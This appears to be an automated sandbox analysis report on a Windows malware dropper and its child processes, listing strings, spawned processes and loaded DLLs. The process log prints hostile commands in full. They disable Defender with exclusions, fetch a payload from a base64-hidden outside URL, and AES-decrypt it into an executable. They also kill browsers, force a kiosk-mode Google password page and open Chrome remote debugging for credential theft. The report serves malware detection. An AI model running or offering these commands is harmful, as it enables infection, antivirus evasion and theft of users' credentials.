Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: c92938c010.exe, 00000010.00000003.2553529678.0000000005D34000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2579825383.0000000005D17000.00000004.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000003.2812744304.0000000005878000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 2bd330404c.exe, 00000011.00000002.2970136551.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

Virustotal: Detection: 58%

Source: c92938c010.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: c92938c010.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe "C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe "C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe "C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe "C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe "C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe"
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2232 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6813d85d-2975-43c3-861c-97300b67dc7e} 4124 "\\.\pipe\gecko-crash-server-pipe.4124" 19ced46f310 socket
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe "C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2696 -parentBuildID 20230927232528 -prefsHandle 4084 -prefMapHandle 3676 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37a942e1-c472-431e-9fe3-e3010ecc3e75} 4124 "\\.\pipe\gecko-crash-server-pipe.4124" 19ced484b10 rdd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe "C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe "C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe"
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe "C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe "C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe "C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe "C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe "C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe "C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"	Jump to behavior
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2232 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6813d85d-2975-43c3-861c-97300b67dc7e} 4124 "\\.\pipe\gecko-crash-server-pipe.4124" 19ced46f310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2696 -parentBuildID 20230927232528 -prefsHandle 4084 -prefMapHandle 3676 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37a942e1-c472-431e-9fe3-e3010ecc3e75} 4124 "\\.\pipe\gecko-crash-server-pipe.4124" 19ced484b10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
